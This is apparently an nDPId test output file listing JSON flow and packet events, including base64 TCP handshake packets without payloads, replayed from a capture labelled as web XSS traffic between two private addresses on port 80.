-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347647733,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647733,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59436,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5696,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cdhAAD4GU\/isEAABwKgKMugsAFDFxvHRAAAAAKACchA9qgAAAgQFtAQCCAoBO4AJAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":2,"flow_last_seen":1499347647733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347647733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6CyQ1\/Exxcbx0qAScSBnHAAAAgQFtAQCCAoD5VF+ATuACQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":3,"flow_last_seen":1499347647734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347647734,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0cdlAAD4GU\/+sEAABwKgKMugsAFDFxvHSkNfxMoAQAOUGJAAAAQEICgE7gAkD5VF+"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347517171,"flow_last_seen":1499347522754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347518410,"flow_last_seen":1499347523754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347519679,"flow_last_seen":1499347524756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347522204,"flow_last_seen":1499347527756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347523488,"flow_last_seen":1499347528757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347647795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347650289,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347650289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1499347650289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjtAAD4GG5WsEAABwKgKMuhGAFAFSiizAAAAAKACchDErAAAAgQFtAQCCAoBO4KIAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5716,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":2,"flow_last_seen":1499347650290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347650290,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6EbKc6N+BUootKAScSD\/tgAAAgQFtAQCCAoD5VP9ATuCiAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":3,"flow_last_seen":1499347650292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347650292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjxAAD4GG5ysEAABwKgKMuhGAFAFSii0ynOjf4AQAOWevQAAAQEICgE7gokD5VP9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347651555,"flow_last_seen":1499347651555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347651555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1499347651555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NDJAAD4GkZ6sEAABwKgKMuhUAFBjE7f2AAAAAKACchDWVQAAAgQFtAQCCAoBO4PEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":2,"flow_last_seen":1499347651556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347651556,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6FRdfw4zYxO396AScSASYwAAAgQFtAQCCAoD5VU6ATuDxAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":3,"flow_last_seen":1499347651561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347651561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NDNAAD4GkaWsEAABwKgKMuhUAFBjE7f3XX8ONIAQAOWxaQAAAQEICgE7g8UD5VU6"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347654065,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347654065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1xAAD4GGnSsEAABwKgKMuhuAFBOzi1kAAAAAKACchBynwAAAgQFtAQCCAoBO4Y4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":2,"flow_last_seen":1499347654065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347654065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6G55d2lhTs4tZaAScSA1EwAAAgQFtAQCCAoD5VetATuGOAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":3,"flow_last_seen":1499347654068,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347654068,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q11AAD4GGnusEAABwKgKMuhuAFBOzi1leXdpYoAQAOXUGQAAAQEICgE7hjkD5Vet"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347655367,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347655367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wQ9AAD4GBMGsEAABwKgKMuh8AFCmFkZxAAAAAKACchAA9gAAAgQFtAQCCAoBO4d+AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":2,"flow_last_seen":1499347655367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347655367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6HyXTysMphZGcqAScSDioAAAAgQFtAQCCAoD5VjzATuHfgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":3,"flow_last_seen":1499347655371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347655371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wRBAAD4GBMisEAABwKgKMuh8AFCmFkZyl08rDYAQAOWBqAAAAQEICgE7h34D5Vjz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347656622,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347656622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":1,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83x1AAD4G5rKsEAABwKgKMuiKAFBnH1eqAAAAAKACchAtbQAAAgQFtAQCCAoBO4i3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":2,"flow_last_seen":1499347656622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347656622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6Ios50nrZx9Xq6AScSBZZwAAAgQFtAQCCAoD5VotATuItwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_packet_id":3,"flow_last_seen":1499347656624,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347656624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03x5AAD4G5rmsEAABwKgKMuiKAFBnH1erLOdJ7IAQAOX4bQAAAQEICgE7iLgD5Vot"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347524782,"flow_last_seen":1499347530758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347526155,"flow_last_seen":1499347531758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347527425,"flow_last_seen":1499347532758,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347528679,"flow_last_seen":1499347533759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347531303,"flow_last_seen":1499347536759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347532560,"flow_last_seen":1499347537760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347657882,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
